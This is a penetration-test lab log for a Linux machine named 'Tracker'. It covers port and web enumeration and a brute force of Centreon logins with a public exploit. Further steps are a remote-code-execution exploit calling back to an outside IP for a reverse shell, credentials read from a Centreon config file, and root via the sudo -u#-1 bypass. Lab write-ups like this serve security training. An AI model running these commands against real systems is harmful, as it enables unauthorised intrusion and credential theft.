🧪 Pentest Log: {{date:2025-09-05}}

🔍 Target Information

• Machine Name: Tracker
• IP Address: 10.11.1.153
• Operating System: Linux

ip=10.11.1.153

📡 Enumeration

🔌 Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 22

Port 80

Web Content Enumeration

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip -r -o dirsearch.txt

wpscan --url http://$ip

Centreon v. 19.04.0

Google for exploit, found

https://www.exploit-db.com/exploits/52156

python3 52156.py -u $ip -p 80 -l admin -w '/home/kali/Documents/rockyou-utf8.txt'  --insecure

Found credential

admin:sunshine

💣 Exploitation

📌 Vulnerability Summary

• Service / Port: 80
• Vulnerability Type: RCE

🚀 Exploit Execution

🔧 Exploit Method

• Manual
• Public Exploit
• Custom Script

Tool / Script Used:

https://www.exploit-db.com/exploits/47069

python3 47069.py http://$ip/centreon admin sunshine 172.16.1.1 80

python3 /home/kali/Documents/Shell\ Handler/penelope/penelope.py -p 80

Found Credential

cat /etc/centreon/centreon.conf.php


$conf_centreon['user'] = "mon02";
$conf_centreon['password'] = 'AkkWqp123';

🧬 Privilege Escalation

👤 Current Access

• User: mon02
• Groups: 1000(mon02)
• Shell Type: reverse shell

🔍 Enumeration

Sudo:

sudo -l

Found

User mon02 may run the following commands on localhost:
    (ALL, !root) ALL

🔓 Privilege Escalation Exploit

📌 Exploit Summary

• Technique Used: Sudo Abuse
• Target Binary/Service: dnf
• Reference / Source: GTFOBins

🔧 Exploit Steps

https://www.exploit-db.com/exploits/47502

• Smash to root

sudo -u#-1 /bin/bash

• Key File

vblhtebxwf1wwppmret3